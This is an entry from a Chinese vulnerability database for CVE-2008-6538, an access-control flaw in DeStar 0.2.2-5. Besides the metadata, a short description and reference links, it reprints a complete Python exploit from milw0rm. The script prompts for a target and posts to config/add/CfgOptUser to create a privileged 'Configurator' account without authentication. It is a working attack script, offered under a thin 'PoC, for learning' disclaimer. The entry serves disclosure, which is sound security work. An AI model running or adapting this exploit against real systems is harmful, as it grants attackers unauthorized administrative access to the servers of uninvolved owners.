Holger_Schurig Destar 'config/add/CfgOptUser'请求访问控制漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1114829 漏洞类型 输入验证
发布时间 2008-03-23 更新时间 2009-06-17
CVE编号 CVE-2008-6538 CNNVD-ID CNNVD-200903-496
漏洞平台 PHP CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/5298
https://cxsecurity.com/issue/WLB-2009030240
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-496
|漏洞详情
DeStar0.2.2-5版本允许远程攻击者可以借助提交一个对config/add/CfgOptUser的直接请求,添加任意用户。
|漏洞EXP
#
#!/usr/bin/python
#
# Exploit for destar 0.2.2-5, tested on Linux Debian
#
# Bug found and  exploit coded by a non root user
#
# http://nonroot.blogspot.com
#
# Enero 2008
#
# This is a PoC, please use it just for learning how to exploit something
#
# use: $python ./exploit_code.py
#
# required: urllib,urllib2 sys and re
#
import urllib,urllib2
import sys,re
print "Target host: i.e: http://127.0.0.1:8080/"
host=raw_input("Target host ( include http and /): ")
#info for the new user
#
user='mama'
password='mama'
source_ip='127.0.0.9'
phone=''
level='Configurator'
language='en'
#
#
req = urllib2.Request(host)
adduser = urllib.urlencode({'name': user, 'secret': password, 'pc' : source_ip, 'submit' : "Submit", 'phone' : phone, 'level' : level, 'language' : language})
req.add_header('X_FORWARDED_FOR','')
req = urllib2.Request(host+"config/add/CfgOptUser")
r = urllib2.urlopen(req,adduser)
data=r.read()
lookup=re.compile("There were errors").search
match=lookup(data)
if not match:
	print "Ok, now go and test your user at:",host
else:
	print "Exploit failed, sorry, go and find some new bug or check this code and fix it!"
	sys.exit(2)

sys.exit(0)

# milw0rm.com [2008-03-23]
|参考资料

来源:XF
名称:destar-publisher-security-bypass(41384)
链接:http://xforce.iss.net/xforce/xfdb/41384
来源:BID
名称:28426
链接:http://www.securityfocus.com/bid/28426
来源:MILW0RM
名称:5298
链接:http://www.milw0rm.com/exploits/5298